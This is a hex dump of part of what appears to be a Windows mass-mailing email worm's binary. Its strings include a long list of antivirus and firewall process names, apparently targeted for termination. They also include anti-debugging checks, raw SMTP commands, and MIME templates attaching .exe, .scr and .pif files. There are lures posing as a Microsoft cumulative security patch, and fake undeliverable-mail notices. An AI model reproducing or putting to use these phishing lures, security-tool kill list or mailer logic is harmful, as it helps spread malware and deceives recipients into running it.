0000f5e0  00 00 52 01 47 65 74 53  74 64 48 61 6e 64 6c 65  |..R.GetStdHandle|
0000f5f0  00 00 15 01 47 65 74 46  69 6c 65 54 79 70 65 00  |....GetFileType.|
0000f600  9d 01 48 65 61 70 44 65  73 74 72 6f 79 00 9b 01  |..HeapDestroy...|
0000f610  48 65 61 70 43 72 65 61  74 65 00 00 bf 02 56 69  |HeapCreate....Vi|
0000f620  72 74 75 61 6c 46 72 65  65 00 bb 02 56 69 72 74  |rtualFree...Virt|
0000f630  75 61 6c 41 6c 6c 6f 63  00 00 e4 01 4d 75 6c 74  |ualAlloc....Mult|
0000f640  69 42 79 74 65 54 6f 57  69 64 65 43 68 61 72 00  |iByteToWideChar.|
0000f650  53 01 47 65 74 53 74 72  69 6e 67 54 79 70 65 41  |S.GetStringTypeA|
0000f660  00 00 56 01 47 65 74 53  74 72 69 6e 67 54 79 70  |..V.GetStringTyp|
0000f670  65 57 00 00 bf 00 47 65  74 43 50 49 6e 66 6f 00  |eW....GetCPInfo.|
0000f680  b9 00 47 65 74 41 43 50  00 00 31 01 47 65 74 4f  |..GetACP..1.GetO|
0000f690  45 4d 43 50 00 00 bf 01  4c 43 4d 61 70 53 74 72  |EMCP....LCMapStr|
0000f6a0  69 6e 67 41 00 00 c0 01  4c 43 4d 61 70 53 74 72  |ingA....LCMapStr|
0000f6b0  69 6e 67 57 00 00 00 00  00 00 00 00 00 00 00 00  |ingW............|
0000f6c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
000101c0  30 02 41 00 28 02 41 00  20 02 41 00 14 02 41 00  |0.A.(.A. .A...A.|
000101d0  0c 02 41 00 04 02 41 00  f8 01 41 00 f0 01 41 00  |..A...A...A...A.|
000101e0  e4 01 41 00 7a 6f 6e 65  61 6c 61 72 6d 00 00 00  |..A.zonealarm...|
000101f0  7a 61 70 72 6f 00 00 00  77 66 69 6e 64 76 33 32  |zapro...wfindv32|
00010200  00 00 00 00 77 65 62 74  72 61 70 00 76 73 73 74  |....webtrap.vsst|
00010210  61 74 00 00 76 73 68 77  69 6e 33 32 00 00 00 00  |at..vshwin32....|
00010220  76 73 65 63 6f 6d 72 00  76 73 63 61 6e 00 00 00  |vsecomr.vscan...|
00010230  76 65 74 74 72 61 79 00  76 65 74 39 38 00 00 00  |vettray.vet98...|
00010240  76 65 74 39 35 00 00 00  76 65 74 33 32 00 00 00  |vet95...vet32...|
00010250  76 63 6f 6e 74 72 6f 6c  00 00 00 00 76 63 6c 65  |vcontrol....vcle|
00010260  61 6e 65 72 00 00 00 00  74 64 73 32 00 00 00 00  |aner....tds2....|
00010270  74 63 61 00 73 77 65 65  70 00 00 00 73 70 68 69  |tca.sweep...sphi|
00010280  6e 78 00 00 73 65 72 76  39 35 00 00 73 61 66 65  |nx..serv95..safe|
00010290  77 65 62 00 72 65 73 63  75 65 00 00 72 65 67 65  |web.rescue..rege|
000102a0  64 69 74 00 72 61 76 00  70 76 69 65 77 00 00 00  |dit.rav.pview...|
000102b0  70 6f 70 33 74 72 61 70  00 00 00 00 70 65 72 73  |pop3trap....pers|
000102c0  66 77 00 00 70 63 66 77  61 6c 6c 69 63 6f 6e 00  |fw..pcfwallicon.|
000102d0  70 63 63 77 69 6e 39 38  00 00 00 00 70 63 63 6d  |pccwin98....pccm|
000102e0  61 69 6e 00 70 63 63 69  6f 6d 6f 6e 00 00 00 00  |ain.pcciomon....|
000102f0  70 61 76 77 00 00 00 00  70 61 76 73 63 68 65 64  |pavw....pavsched|
00010300  00 00 00 00 70 61 76 63  6c 00 00 00 70 61 64 6d  |....pavcl...padm|
00010310  69 6e 00 00 6f 75 74 70  6f 73 74 00 6e 76 63 39  |in..outpost.nvc9|
00010320  35 00 00 00 6e 75 70 67  72 61 64 65 00 00 00 00  |5...nupgrade....|
00010330  6e 75 70 64 61 74 65 00  6e 6f 72 6d 69 73 74 00  |nupdate.normist.|
00010340  6e 6d 61 69 6e 00 00 00  6e 69 73 75 6d 00 00 00  |nmain...nisum...|
00010350  6e 61 76 77 00 00 00 00  6e 61 76 73 63 68 65 64  |navw....navsched|
00010360  00 00 00 00 6e 61 76 6e  74 00 00 00 6e 61 76 6c  |....navnt...navl|
00010370  75 33 32 00 6e 61 76 61  70 77 33 32 00 00 00 00  |u32.navapw32....|
00010380  6e 61 69 5f 76 73 5f 73  74 61 74 00 6d 73 63 6f  |nai_vs_stat.msco|
00010390  6e 66 69 67 00 00 00 00  6d 70 66 74 72 61 79 00  |nfig....mpftray.|
000103a0  6d 6f 6f 6c 69 76 65 00  6c 75 61 6c 6c 00 00 00  |moolive.luall...|
000103b0  6c 6f 6f 6b 6f 75 74 00  6c 6f 63 6b 64 6f 77 6e  |lookout.lockdown|
000103c0  32 30 30 30 00 00 00 00  6b 70 66 77 33 32 00 00  |2000....kpfw32..|
000103d0  6a 65 64 69 00 00 00 00  69 6f 6d 6f 6e 39 38 00  |jedi....iomon98.|
000103e0  69 66 61 63 65 00 00 00  69 63 73 75 70 70 00 00  |iface...icsupp..|
000103f0  69 63 73 73 75 70 70 6e  74 00 00 00 69 63 6d 6f  |icssuppnt...icmo|
00010400  6f 6e 00 00 69 63 6d 6f  6e 00 00 00 69 63 6c 6f  |on..icmon...iclo|
00010410  61 64 6e 74 00 00 00 00  69 63 6c 6f 61 64 39 35  |adnt....icload95|
00010420  00 00 00 00 69 62 6d 61  76 73 70 00 69 62 6d 61  |....ibmavsp.ibma|
00010430  73 6e 00 00 69 61 6d 73  65 72 76 00 69 61 6d 61  |sn..iamserv.iama|
00010440  70 70 00 00 67 69 62 65  00 00 00 00 66 2d 73 74  |pp..gibe....f-st|
00010450  6f 70 77 00 66 72 77 00  66 70 2d 77 69 6e 00 00  |opw.frw.fp-win..|
00010460  66 2d 70 72 6f 74 39 35  00 00 00 00 66 70 72 6f  |f-prot95....fpro|
00010470  74 39 35 00 66 2d 70 72  6f 74 00 00 66 70 72 6f  |t95.f-prot..fpro|
00010480  74 00 00 00 66 69 6e 64  76 69 72 75 00 00 00 00  |t...findviru....|
00010490  66 2d 61 67 6e 74 39 35  00 00 00 00 65 73 70 77  |f-agnt95....espw|
000104a0  61 74 63 68 00 00 00 00  65 73 61 66 65 00 00 00  |atch....esafe...|
000104b0  65 66 69 6e 65 74 33 32  00 00 00 00 65 63 65 6e  |efinet32....ecen|
000104c0  67 69 6e 65 00 00 00 00  64 76 39 35 00 00 00 00  |gine....dv95....|
000104d0  63 6c 61 77 39 35 00 00  63 66 69 6e 65 74 00 00  |claw95..cfinet..|
000104e0  63 66 69 6e 64 00 00 00  63 66 69 61 75 64 69 74  |cfind...cfiaudit|
000104f0  00 00 00 00 63 66 69 61  64 6d 69 6e 00 00 00 00  |....cfiadmin....|
00010500  63 63 73 68 74 64 77 6e  00 00 00 00 63 63 61 70  |ccshtdwn....ccap|
00010510  70 00 00 00 62 6f 6f 74  77 61 72 6e 00 00 00 00  |p...bootwarn....|
00010520  62 6c 61 63 6b 69 63 65  00 00 00 00 62 6c 61 63  |blackice....blac|
00010530  6b 64 00 00 61 76 77 75  70 64 33 32 00 00 00 00  |kd..avwupd32....|
00010540  61 76 77 69 6e 39 35 00  61 76 73 63 68 65 64 33  |avwin95.avsched3|
00010550  32 00 00 00 61 76 70 00  61 76 6e 74 00 00 00 00  |2...avp.avnt....|
00010560  61 76 6b 73 65 72 76 00  61 76 67 77 00 00 00 00  |avkserv.avgw....|
00010570  61 76 67 63 74 72 6c 00  61 76 67 63 63 33 32 00  |avgctrl.avgcc32.|
00010580  61 76 65 33 32 00 00 00  61 76 63 6f 6e 73 6f 6c  |ave32...avconsol|
00010590  00 00 00 00 61 75 74 6f  64 6f 77 6e 00 00 00 00  |....autodown....|
000105a0  61 70 76 78 64 77 69 6e  00 00 00 00 61 70 6c 69  |apvxdwin....apli|
000105b0  63 61 33 32 00 00 00 00  61 6e 74 69 2d 74 72 6f  |ca32....anti-tro|
000105c0  6a 61 6e 00 61 63 6b 77  69 6e 33 32 00 00 00 00  |jan.ackwin32....|
000105d0  5f 61 76 70 00 00 00 00  5c 53 74 72 69 6e 67 46  |_avp....\StringF|
000105e0  69 6c 65 49 6e 66 6f 5c  25 73 5c 4f 72 69 67 69  |ileInfo\%s\Origi|
000105f0  6e 61 6c 46 69 6c 65 6e  61 6d 65 00 25 30 34 58  |nalFilename.%04X|
00010600  25 30 34 58 00 00 00 00  5c 56 61 72 46 69 6c 65  |%04X....\VarFile|
00010610  49 6e 66 6f 5c 54 72 61  6e 73 6c 61 74 69 6f 6e  |Info\Translation|
00010620  00 00 00 00 54 72 79 20  74 6f 20 70 75 6c 6c 20  |....Try to pull |
00010630  6d 79 20 6c 65 67 73 3f  00 00 00 00 20 00 00 00  |my legs?.... ...|
00010640  49 73 44 65 62 75 67 67  65 72 50 72 65 73 65 6e  |IsDebuggerPresen|
00010650  74 00 00 00 50 72 6f 63  65 73 73 33 32 4e 65 78  |t...Process32Nex|
00010660  74 00 00 00 50 72 6f 63  65 73 73 33 32 46 69 72  |t...Process32Fir|
00010670  73 74 00 00 43 72 65 61  74 65 54 6f 6f 6c 68 65  |st..CreateToolhe|
00010680  6c 70 33 32 53 6e 61 70  73 68 6f 74 00 00 00 00  |lp32Snapshot....|
00010690  6b 65 72 6e 65 6c 33 32  2e 64 6c 6c 00 00 00 00  |kernel32.dll....|
000106a0  47 65 74 4d 6f 64 75 6c  65 46 69 6c 65 4e 61 6d  |GetModuleFileNam|
000106b0  65 45 78 41 00 00 00 00  45 6e 75 6d 50 72 6f 63  |eExA....EnumProc|
000106c0  65 73 73 4d 6f 64 75 6c  65 73 00 00 45 6e 75 6d  |essModules..Enum|
000106d0  50 72 6f 63 65 73 73 65  73 00 00 00 70 73 61 70  |Processes...psap|
000106e0  69 2e 64 6c 6c 00 00 00  0d 0a 2e 0d 0a 00 00 00  |i.dll...........|
000106f0  0d 0a 00 00 3a 00 00 00  48 45 41 44 20 25 73 0d  |....:...HEAD %s.|
00010700  0a 00 00 00 52 43 50 54  20 54 4f 3a 20 3c 25 73  |....RCPT TO: <%s|
00010710  3e 0d 0a 00 51 55 49 54  0d 0a 00 00 33 35 34 00  |>...QUIT....354.|
00010720  44 41 54 41 0d 0a 00 00  4d 41 49 4c 20 46 52 4f  |DATA....MAIL FRO|
00010730  4d 3a 20 3c 25 73 3e 0d  0a 00 00 00 32 35 30 00  |M: <%s>.....250.|
00010740  48 45 4c 4f 20 25 73 0d  0a 00 00 00 32 32 30 00  |HELO %s.....220.|
00010750  5c 67 65 72 6d 73 31 2e  64 62 76 00 5c 67 65 72  |\germs1.dbv.\ger|
00010760  6d 73 30 2e 64 62 76 00  43 55 53 54 4f 4d 00 00  |ms0.dbv.CUSTOM..|
00010770  2d 2d 0d 0a 0d 0a 2e 0d  0a 00 00 00 22 0d 0a 43  |--.........."..C|
00010780  6f 6e 74 65 6e 74 2d 54  72 61 6e 73 66 65 72 2d  |ontent-Transfer-|
00010790  45 6e 63 6f 64 69 6e 67  3a 20 62 61 73 65 36 34  |Encoding: base64|
000107a0  0d 0a 43 6f 6e 74 65 6e  74 2d 44 69 73 70 6f 73  |..Content-Dispos|
000107b0  69 74 69 6f 6e 3a 20 61  74 74 61 63 68 6d 65 6e  |ition: attachmen|
000107c0  74 0d 0a 0d 0a 00 00 00  2e 65 78 65 00 00 00 00  |t........exe....|
000107d0  25 73 5c 25 73 00 00 00  2e 7a 69 70 00 00 00 00  |%s\%s....zip....|
000107e0  3b 20 6e 61 6d 65 3d 22  00 00 00 00 6d 73 64 6f  |; name="....msdo|
000107f0  77 6e 6c 6f 61 64 00 00  63 6f 6d 70 72 65 73 73  |wnload..compress|
00010800  65 64 00 00 0d 0a 43 6f  6e 74 65 6e 74 2d 54 79  |ed....Content-Ty|
00010810  70 65 3a 20 61 70 70 6c  69 63 61 74 69 6f 6e 2f  |pe: application/|
00010820  78 2d 00 00 2d 2d 0d 0a  0d 0a 2d 2d 00 00 00 00  |x-..--....--....|
00010830  3e 0d 0a 0d 0a 00 00 00  36 34 34 37 38 32 31 00  |>.......6447821.|
00010840  0d 0a 43 6f 6e 74 65 6e  74 2d 54 79 70 65 3a 20  |..Content-Type: |
00010850  69 6d 61 67 65 2f 67 69  66 0d 0a 43 6f 6e 74 65  |image/gif..Conte|
00010860  6e 74 2d 54 72 61 6e 73  66 65 72 2d 45 6e 63 6f  |nt-Transfer-Enco|
00010870  64 69 6e 67 3a 20 62 61  73 65 36 34 0d 0a 43 6f  |ding: base64..Co|
00010880  6e 74 65 6e 74 2d 49 44  3a 20 3c 00 35 38 39 37  |ntent-ID: <.5897|
00010890  34 32 31 00 2d 2d 00 00  0d 0a 0d 0a 2d 2d 00 00  |421.--......--..|
000108a0  25 69 00 00 3c 42 52 3e  3c 42 52 3e 0d 0a 00 00  |%i..<BR><BR>....|
000108b0  0d 0a 43 6f 6e 74 65 6e  74 2d 54 79 70 65 3a 20  |..Content-Type: |
000108c0  74 65 78 74 2f 68 74 6d  6c 0d 0a 43 6f 6e 74 65  |text/html..Conte|
000108d0  6e 74 2d 54 72 61 6e 73  66 65 72 2d 45 6e 63 6f  |nt-Transfer-Enco|
000108e0  64 69 6e 67 3a 20 71 75  6f 74 65 64 2d 70 72 69  |ding: quoted-pri|
000108f0  6e 74 61 62 6c 65 0d 0a  0d 0a 00 00 0d 0a 2d 2d  |ntable........--|
00010900  00 00 00 00 43 6f 70 79  72 69 67 68 74 20 25 69  |....Copyright %i|
00010910  20 4d 69 63 72 6f 73 6f  66 74 20 43 6f 72 70 6f  | Microsoft Corpo|
00010920  72 61 74 69 6f 6e 2e 0d  0a 00 00 00 0d 0a 0d 0a  |ration..........|
00010930  00 00 00 00 0d 0a 43 6f  6e 74 65 6e 74 2d 54 79  |......Content-Ty|
00010940  70 65 3a 20 74 65 78 74  2f 70 6c 61 69 6e 0d 0a  |pe: text/plain..|
00010950  43 6f 6e 74 65 6e 74 2d  54 72 61 6e 73 66 65 72  |Content-Transfer|
00010960  2d 45 6e 63 6f 64 69 6e  67 3a 20 71 75 6f 74 65  |-Encoding: quote|
00010970  64 2d 70 72 69 6e 74 61  62 6c 65 0d 0a 0d 0a 00  |d-printable.....|
00010980  0d 0a 43 6f 6e 74 65 6e  74 2d 54 79 70 65 3a 20  |..Content-Type: |
00010990  6d 75 6c 74 69 70 61 72  74 2f 61 6c 74 65 72 6e  |multipart/altern|
000109a0  61 74 69 76 65 3b 20 62  6f 75 6e 64 61 72 79 3d  |ative; boundary=|
000109b0  22 00 00 00 22 3b 0d 0a  09 74 79 70 65 3d 22 6d  |"...";...type="m|
000109c0  75 6c 74 69 70 61 72 74  2f 61 6c 74 65 72 6e 61  |ultipart/alterna|
000109d0  74 69 76 65 22 0d 0a 0d  0a 2d 2d 00 0d 0a 43 6f  |tive"....--...Co|
000109e0  6e 74 65 6e 74 2d 54 79  70 65 3a 20 6d 75 6c 74  |ntent-Type: mult|
000109f0  69 70 61 72 74 2f 72 65  6c 61 74 65 64 3b 20 62  |ipart/related; b|
00010a00  6f 75 6e 64 61 72 79 3d  22 00 00 00 22 0d 0a 0d  |oundary="..."...|
00010a10  0a 2d 2d 00 0d 0a 4d 69  6d 65 2d 56 65 72 73 69  |.--...Mime-Versi|
00010a20  6f 6e 3a 20 31 2e 30 0d  0a 43 6f 6e 74 65 6e 74  |on: 1.0..Content|
00010a30  2d 54 79 70 65 3a 20 6d  75 6c 74 69 70 61 72 74  |-Type: multipart|
00010a40  2f 6d 69 78 65 64 3b 20  62 6f 75 6e 64 61 72 79  |/mixed; boundary|
00010a50  3d 22 00 00 0d 0a 58 2d  49 44 3a 20 00 00 00 00  |="....X-ID: ....|
00010a60  20 43 6f 72 70 2e 00 00  20 43 6f 72 70 6f 72 61  | Corp... Corpora|
00010a70  74 69 6f 6e 00 00 00 00  4d 24 00 00 4d 53 00 00  |tion....M$..MS..|
00010a80  66 72 6f 6d 20 00 00 00  63 6f 6d 65 73 20 00 00  |from ...comes ..|
00010a90  63 61 6d 65 20 00 00 00  77 68 69 63 68 20 00 00  |came ...which ..|
00010aa0  49 6e 74 65 72 6e 65 74  20 45 78 70 6c 6f 72 65  |Internet Explore|
00010ab0  72 00 00 00 57 69 6e 64  6f 77 73 00 66 6f 72 20  |r...Windows.for |
00010ac0  00 00 00 00 75 70 64 61  74 65 00 00 70 61 74 63  |....update..patc|
00010ad0  68 00 00 00 70 61 63 6b  61 67 65 00 70 61 63 6b  |h...package.pack|
00010ae0  00 00 00 00 63 6f 72 72  65 63 74 69 6f 6e 20 00  |....correction .|
00010af0  63 6f 72 72 65 63 74 69  76 65 20 00 73 65 63 75  |corrective .secu|
00010b00  72 69 74 79 20 00 00 00  63 72 69 74 69 63 61 6c  |rity ...critical|
00010b10  20 00 00 00 69 6e 74 65  72 6e 65 74 20 00 00 00  | ...internet ...|
00010b20  69 6d 70 6f 72 74 61 6e  74 20 00 00 74 68 65 73  |important ..thes|
00010b30  65 20 00 00 74 68 65 20  00 00 00 00 74 68 61 74  |e ..the ....that|
00010b40  20 00 00 00 74 68 69 73  20 00 00 00 49 6e 73 74  | ...this ...Inst|
00010b50  61 6c 6c 20 00 00 00 00  41 70 70 6c 79 20 00 00  |all ....Apply ..|
00010b60  55 73 65 20 00 00 00 00  57 61 74 63 68 20 00 00  |Use ....Watch ..|
00010b70  53 65 65 20 00 00 00 00  54 61 6b 65 20 61 20 6c  |See ....Take a l|
00010b80  6f 6f 6b 20 61 74 20 00  4c 6f 6f 6b 20 61 74 20  |ook at .Look at |
00010b90  00 00 00 00 54 72 79 20  6f 6e 20 00 54 72 79 20  |....Try on .Try |
00010ba0  00 00 00 00 54 61 73 74  65 20 00 00 50 72 6f 76  |....Taste ..Prov|
00010bb0  65 20 00 00 43 68 65 63  6b 20 6f 75 74 20 00 00  |e ..Check out ..|
00010bc0  43 68 65 63 6b 20 00 00  46 57 3a 20 00 00 00 00  |Check ..FW: ....|
00010bd0  46 57 44 3a 20 00 00 00  52 45 3a 20 00 00 00 00  |FWD: ...RE: ....|
00010be0  55 70 67 72 61 64 65 00  50 61 63 6b 00 00 00 00  |Upgrade.Pack....|
00010bf0  55 70 64 61 74 65 00 00  50 61 74 63 68 00 00 00  |Update..Patch...|
00010c00  43 72 69 74 69 63 61 6c  20 00 00 00 4e 65 74 20  |Critical ...Net |
00010c10  00 00 00 00 4c 61 74 65  73 74 20 00 4e 65 77 20  |....Latest .New |
00010c20  00 00 00 00 4c 61 73 74  20 00 00 00 4e 65 77 65  |....Last ...Newe|
00010c30  73 74 20 00 43 75 72 72  65 6e 74 20 00 00 00 00  |st .Current ....|
00010c40  0d 0a 53 55 42 4a 45 43  54 3a 20 00 3e 00 00 00  |..SUBJECT: .>...|
00010c50  43 6c 69 65 6e 74 00 00  43 6f 6e 73 75 6d 65 72  |Client..Consumer|
00010c60  00 00 00 00 50 61 72 74  6e 65 72 00 55 73 65 72  |....Partner.User|
00010c70  00 00 00 00 43 75 73 74  6f 6d 65 72 00 00 00 00  |....Customer....|
00010c80  43 6f 6d 6d 65 72 63 69  61 6c 20 00 3e 0d 0a 4e  |Commercial .>..N|
00010c90  45 57 53 47 52 4f 55 50  53 3a 20 00 3e 0d 0a 54  |EWSGROUPS: .>..T|
00010ca0  4f 3a 20 22 00 00 00 00  2e 6e 65 74 00 00 00 00  |O: ".....net....|
00010cb0  2e 63 6f 6d 00 00 00 00  6d 73 64 6e 00 00 00 00  |.com....msdn....|
00010cc0  6d 69 63 72 6f 73 6f 66  74 00 00 00 6d 73 00 00  |microsoft...ms..|
00010cd0  6d 73 6e 00 2e 00 00 00  6e 65 77 73 00 00 00 00  |msn.....news....|
00010ce0  62 75 6c 6c 65 74 69 6e  00 00 00 00 63 6f 6e 66  |bulletin....conf|
00010cf0  69 64 65 6e 63 65 00 00  61 64 76 69 73 6f 72 00  |idence..advisor.|
00010d00  75 70 64 61 74 65 73 00  74 65 63 68 6e 65 74 00  |updates.technet.|
00010d10  73 75 70 70 6f 72 74 00  6e 65 77 73 6c 65 74 74  |support.newslett|
00010d20  65 72 73 00 40 00 00 00  2d 00 00 00 5f 00 00 00  |ers.@...-..._...|
00010d30  22 20 3c 00 75 6e 6b 6e  6f 77 6e 00 4d 69 63 72  |" <.unknown.Micr|
00010d40  6f 73 6f 66 74 00 00 00  53 75 70 70 6f 72 74 00  |osoft...Support.|
00010d50  41 73 73 69 73 74 61 6e  63 65 00 00 53 65 72 76  |Assistance..Serv|
00010d60  69 63 65 73 00 00 00 00  42 75 6c 6c 65 74 69 6e  |ices....Bulletin|
00010d70  00 00 00 00 43 75 73 74  6f 6d 65 72 20 00 00 00  |....Customer ...|
00010d80  50 75 62 6c 69 63 20 00  54 65 63 68 6e 69 63 61  |Public .Technica|
00010d90  6c 20 00 00 43 65 6e 74  65 72 00 00 44 65 70 61  |l ..Center..Depa|
00010da0  72 74 6d 65 6e 74 00 00  53 65 63 74 69 6f 6e 00  |rtment..Section.|
00010db0  44 69 76 69 73 69 6f 6e  00 00 00 00 53 65 63 75  |Division....Secu|
00010dc0  72 69 74 79 20 00 00 00  4e 65 74 77 6f 72 6b 20  |rity ...Network |
00010dd0  00 00 00 00 49 6e 74 65  72 6e 65 74 20 00 00 00  |....Internet ...|
00010de0  50 72 6f 67 72 61 6d 20  00 00 00 00 43 6f 72 70  |Program ....Corp|
00010df0  6f 72 61 74 69 6f 6e 20  00 00 00 00 4d 69 63 72  |oration ....Micr|
00010e00  6f 73 6f 66 74 20 00 00  4d 53 20 00 46 52 4f 4d  |osoft ..MS .FROM|
00010e10  3a 20 22 00 0d 0a 54 68  69 73 20 75 70 64 61 74  |: "...This updat|
00010e20  65 20 69 6e 63 6c 75 64  65 73 20 74 68 65 20 66  |e includes the f|
00010e30  75 6e 63 74 69 6f 6e 61  6c 69 74 79 20 3d 0d 0a  |unctionality =..|
00010e40  6f 66 20 61 6c 6c 20 70  72 65 76 69 6f 75 73 6c  |of all previousl|
00010e50  79 20 72 65 6c 65 61 73  65 64 20 70 61 74 63 68  |y released patch|
00010e60  65 73 2e 00 63 6f 6d 70  75 74 65 72 00 00 00 00  |es..computer....|
00010e70  73 79 73 74 65 6d 00 00  20 6f 6e 20 79 6f 75 72  |system.. on your|
00010e80  20 00 00 00 63 6f 64 65  00 00 00 00 65 78 65 63  | ...code....exec|
00010e90  75 74 61 62 6c 65 00 00  20 74 6f 20 72 75 6e 20  |utable.. to run |
00010ea0  00 00 00 00 6d 61 6c 69  63 69 6f 75 73 20 75 73  |....malicious us|
00010eb0  65 72 00 00 61 74 74 61  63 6b 65 72 00 00 00 00  |er..attacker....|
00010ec0  2c 20 74 68 65 20 6d 6f  73 74 20 73 65 72 69 6f  |, the most serio|
00010ed0  75 73 20 6f 66 20 77 68  69 63 68 20 63 6f 75 6c  |us of which coul|
00010ee0  64 0d 0a 61 6c 6c 6f 77  20 61 6e 20 00 00 00 00  |d..allow an ....|
00010ef0  0d 0a 66 72 6f 6d 20 74  68 65 73 65 20 76 75 6c  |..from these vul|
00010f00  6e 65 72 61 62 69 6c 69  74 69 65 73 00 00 00 00  |nerabilities....|
00010f10  6d 61 69 6e 74 61 69 6e  20 74 68 65 20 73 65 63  |maintain the sec|
00010f20  75 72 69 74 79 20 6f 66  20 79 6f 75 72 20 63 6f  |urity of your co|
00010f30  6d 70 75 74 65 72 00 00  70 72 6f 74 65 63 74 20  |mputer..protect |
00010f40  79 6f 75 72 20 63 6f 6d  70 75 74 65 72 00 00 00  |your computer...|
00010f50  68 65 6c 70 20 00 00 00  63 6f 6e 74 69 6e 75 65  |help ...continue|
00010f60  20 6b 65 65 70 69 6e 67  20 79 6f 75 72 20 63 6f  | keeping your co|
00010f70  6d 70 75 74 65 72 20 73  65 63 75 72 65 00 00 00  |mputer secure...|
00010f80  2e 0d 0a 49 6e 73 74 61  6c 6c 20 6e 6f 77 20 74  |...Install now t|
00010f90  6f 20 00 00 20 76 75 6c  6e 65 72 61 62 69 6c 69  |o .. vulnerabili|
00010fa0  74 69 65 73 00 00 00 00  6e 65 77 00 6e 65 77 6c  |ties....new.newl|
00010fb0  79 20 64 69 73 63 6f 76  65 72 65 64 00 00 00 00  |y discovered....|
00010fc0  0d 0a 61 73 20 77 65 6c  6c 20 61 73 20 74 68 72  |..as well as thr|
00010fd0  65 65 20 00 0d 0a 61 6c  6c 20 6b 6e 6f 77 6e 20  |ee ...all known |
00010fe0  73 65 63 75 72 69 74 79  20 76 75 6c 6e 65 72 61  |security vulnera|
00010ff0  62 69 6c 69 74 69 65 73  20 61 66 66 65 63 74 69  |bilities affecti|
00011000  6e 67 0d 0a 4d 53 20 49  6e 74 65 72 6e 65 74 20  |ng..MS Internet |
00011010  45 78 70 6c 6f 72 65 72  2c 20 4d 53 20 4f 75 74  |Explorer, MS Out|
00011020  6c 6f 6f 6b 20 61 6e 64  20 4d 53 20 4f 75 74 6c  |look and MS Outl|
00011030  6f 6f 6b 20 45 78 70 72  65 73 73 00 65 6c 69 6d  |ook Express.elim|
00011040  69 6e 61 74 65 73 00 00  72 65 73 6f 6c 76 65 73  |inates..resolves|
00011050  00 00 00 00 66 69 78 65  73 00 00 00 20 25 69 2c  |....fixes... %i,|
00011060  20 43 75 6d 75 6c 61 74  69 76 65 20 50 61 74 63  | Cumulative Patc|
00011070  68 22 20 75 70 64 61 74  65 20 77 68 69 63 68 20  |h" update which |
00011080  00 00 00 00 44 65 63 65  6d 62 65 72 00 00 00 00  |....December....|
00011090  4e 6f 76 65 6d 62 65 72  00 00 00 00 4f 63 74 6f  |November....Octo|
000110a0  62 65 72 00 53 65 70 74  65 6d 62 65 72 00 00 00  |ber.September...|
000110b0  41 75 67 75 73 74 00 00  4a 75 6c 79 00 00 00 00  |August..July....|
000110c0  4a 75 6e 65 00 00 00 00  4d 61 79 00 41 70 72 69  |June....May.Apri|
000110d0  6c 00 00 00 4d 61 72 63  68 00 00 00 46 65 62 72  |l...March...Febr|
000110e0  75 61 72 79 00 00 00 00  4a 61 6e 75 61 72 79 00  |uary....January.|
000110f0  74 68 69 73 20 69 73 20  74 68 65 20 6c 61 74 65  |this is the late|
00011100  73 74 20 76 65 72 73 69  6f 6e 20 6f 66 20 73 65  |st version of se|
00011110  63 75 72 69 74 79 20 75  70 64 61 74 65 2c 20 74  |curity update, t|
00011120  68 65 0d 0a 22 00 00 00  22 0d 0a 43 6f 6e 74 65  |he.."..."..Conte|
00011130  6e 74 2d 54 72 61 6e 73  66 65 72 2d 45 6e 63 6f  |nt-Transfer-Enco|
00011140  64 69 6e 67 3a 20 62 61  73 65 36 34 0d 0a 43 6f  |ding: base64..Co|
00011150  6e 74 65 6e 74 2d 49 64  3a 20 3c 00 63 6f 6d 00  |ntent-Id: <.com.|
00011160  73 63 72 00 62 61 74 00  70 69 66 00 65 78 65 00  |scr.bat.pif.exe.|
00011170  77 61 76 00 6d 69 64 69  00 00 00 00 2d 2d 25 73  |wav.midi....--%s|
00011180  0d 0a 43 6f 6e 74 65 6e  74 2d 54 79 70 65 3a 20  |..Content-Type: |
00011190  61 75 64 69 6f 2f 78 2d  00 00 00 00 3c 2f 42 4f  |audio/x-....</BO|
000111a0  44 59 3e 3c 2f 48 54 4d  4c 3e 0d 0a 0d 0a 00 00  |DY></HTML>......|
000111b0  3c 42 52 3e 3c 42 52 3e  3c 42 52 3e 4d 65 73 73  |<BR><BR><BR>Mess|
000111c0  61 67 65 20 66 6f 6c 6c  6f 77 73 3a 3c 42 52 3e  |age follows:<BR>|
000111d0  3c 42 52 3e 3c 42 52 3e  3c 42 52 3e 0d 0a 00 00  |<BR><BR><BR>....|
000111e0  74 6f 20 3c 42 3e 25 73  40 25 73 3c 2f 42 3e 0d  |to <B>%s@%s</B>.|
000111f0  0a 00 00 00 6d 61 69 6c  20 00 00 00 6d 65 73 73  |....mail ...mess|
00011200  61 67 65 20 00 00 00 00  3c 42 52 3e 3c 42 52 3e  |age ....<BR><BR>|
00011210  3c 42 52 3e 55 6e 64 65  6c 69 76 65 72 65 64 20  |<BR>Undelivered |
00011220  00 00 00 00 3c 42 52 3e  3c 42 52 3e 3c 42 52 3e  |....<BR><BR><BR>|
00011230  55 6e 64 65 6c 69 76 65  72 61 62 6c 65 20 00 00  |Undeliverable ..|
00011240  74 6f 20 6f 6e 65 20 6f  72 20 6d 6f 72 65 20 64  |to one or more d|
00011250  65 73 74 69 6e 61 74 69  6f 6e 73 2e 3c 42 52 3e  |estinations.<BR>|
00011260  0d 0a 00 00 74 6f 20 74  68 65 20 66 6f 6c 6c 6f  |....to the follo|
00011270  77 69 6e 67 20 61 64 64  72 65 73 73 65 73 3a 3c  |wing addresses:<|
00011280  42 52 3e 0d 0a 00 00 00  74 68 65 20 6d 65 73 73  |BR>.....the mess|
00011290  61 67 65 20 72 65 74 75  72 6e 65 64 20 62 65 6c  |age returned bel|
000112a0  6f 77 20 63 6f 75 6c 64  20 6e 6f 74 20 62 65 20  |ow could not be |
000112b0  64 65 6c 69 76 65 72 65  64 20 3d 0d 0a 00 00 00  |delivered =.....|
000112c0  49 20 77 61 73 6e 27 74  20 61 62 6c 65 20 74 6f  |I wasn't able to|
000112d0  20 64 65 6c 69 76 65 72  20 79 6f 75 72 20 6d 65  | deliver your me|
000112e0  73 73 61 67 65 20 3d 0d  0a 00 00 00 3c 42 52 3e  |ssage =.....<BR>|
000112f0  49 27 6d 20 61 66 72 61  69 64 20 3d 0d 0a 00 00  |I'm afraid =....|
00011300  3c 42 52 3e 49 27 6d 20  73 6f 72 72 79 20 74 6f  |<BR>I'm sorry to|
00011310  20 68 61 76 65 20 74 6f  20 69 6e 66 6f 72 6d 20  | have to inform |
